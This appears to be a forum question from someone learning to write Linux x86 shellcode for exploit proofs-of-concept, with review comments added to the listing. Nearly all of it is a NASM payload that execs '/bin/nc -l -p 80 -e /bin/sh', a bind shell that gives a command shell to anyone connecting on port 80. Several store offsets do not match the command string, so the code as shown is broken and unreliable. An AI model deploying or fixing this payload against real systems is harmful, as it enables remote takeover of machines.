

Linux Intel Assembly for shellcode

I am trying to learn how to write shellcode for proof-of-concepts of exploits I find, but I am not very good at assembly.
This is the code I was working on. It assembles fine, but I think I have made a mistake in a calculation somewhere. It launches Netcat as I asked it to, but the rest of the Netcat command is not run...

; Linux/x86 (32-bit) position-independent stub, Intel/NASM-style syntax,
; system calls via int 0x80.
; Layout (from the author's comments): a '#'-separated command string
; followed by 4-byte slots (AAAA..GGGG). At run time the code obtains the
; string's address in esi, patches the string in place, fills the slots with
; pointers into the string, and then issues the int 0x80 system call that the
; author identifies as execve.
; NOTE(review): the labels `_start`, `a` and `b` referenced below are not in
; the listing as pasted — presumably `b:` sits on the `call a` line and `a:`
; on `pop esi` (the usual jmp/call/pop sequence); confirm against the original
; source.
; NOTE(review): every store below writes into the same section the code lives
; in (`Section .text`), so this only runs where that mapping is writable as
; well as executable; on a W^X / NX-enforced text segment the first store
; faults.
; NOTE(review): each store offset is relative to esi, i.e. to the first byte
; of the db literal at the bottom; the inline comments record the *intended*
; target of each write as the author gave it, not a verified one.
Section .text
global _start

jmp short b                     ; to the `call` that pushes the string's address


pop esi                         ; esi = address of the string (pushed by `call a`)
xor eax, eax                    ; eax = 0; al is the NUL byte stored below
mov byte [esi + 7], al ; [esi+7]  = 0, intended to terminate /bin/nc
mov byte [esi + 10], al ; [esi+10] = 0, intended to terminate -l
mov byte [esi + 13], al ; [esi+13] = 0, intended to terminate -p
mov byte [esi + 17], al ; [esi+17] = 0, intended to terminate 80
mov byte [esi + 20], al ; [esi+20] = 0, intended to terminate -e
mov byte [esi + 27], al ; [esi+27] = 0, intended to terminate /bin/sh
; NOTE(review): `long` is used here as the 32-bit size keyword; NASM spells
; that `dword` — confirm which assembler this listing was built with.
mov long [esi + 29], esi ; [esi+29] = esi, intended: address of /bin/nc in AAAA
lea ebx, [esi + 8] ; ebx = esi+8, intended: address of -l
mov long [esi + 33], ebx ; [esi+33] = ebx, intended: -l pointer in BBBB
lea ebx, [esi + 11] ; ebx = esi+11, intended: address of -p
mov long [esi + 37], ebx ; [esi+37] = ebx, intended: -p pointer in CCCC
lea ebx, [esi + 14] ; ebx = esi+14, intended: address of 80
mov long [esi + 41], ebx ; [esi+41] = ebx, intended: 80 pointer in DDDD
lea ebx, [esi + 17] ; ebx = esi+17, intended: address of -e
mov long [esi + 45], ebx ; [esi+45] = ebx, intended: -e pointer in EEEE
lea ebx, [esi + 20] ; ebx = esi+20, intended: address of /bin/sh
mov long [esi + 49], ebx ; [esi+49] = ebx, intended: /bin/sh pointer in FFFF
mov long [esi + 53], eax ; [esi+53] = 0 (eax is still zero from the xor above), intended: NULL in GGGG
; NOTE(review): a size keyword on a register operand is unusual — confirm the
; assembler accepts `byte al` rather than plain `al`.
mov byte al, 0x0b ; al = 0x0b, the system call number the author identifies as execve
mov ebx, esi ; ebx = string address (first argument: program path)
lea ecx, [esi + 29] ; ecx = esi+29 (second argument: the slot area used as the argument array)
lea edx, [esi + 53] ; edx = esi+53 (third argument: the slot the author zeroed above)
int 0x80 ; enter the kernel with eax/ebx/ecx/edx set as above

call a                          ; pushes the address of the following bytes, then continues at `a`
; Command string: '#' marks each field boundary; the runs of A..G are the
; 4-byte slots written above. The first-letter offsets this data implies are
; the reference for every [esi + N] store in the code.
db '/bin/nc#-l#-p#80#-e#/bin/sh#AAAABBBBCCCCDDDDEEEEFFFFFGGGG'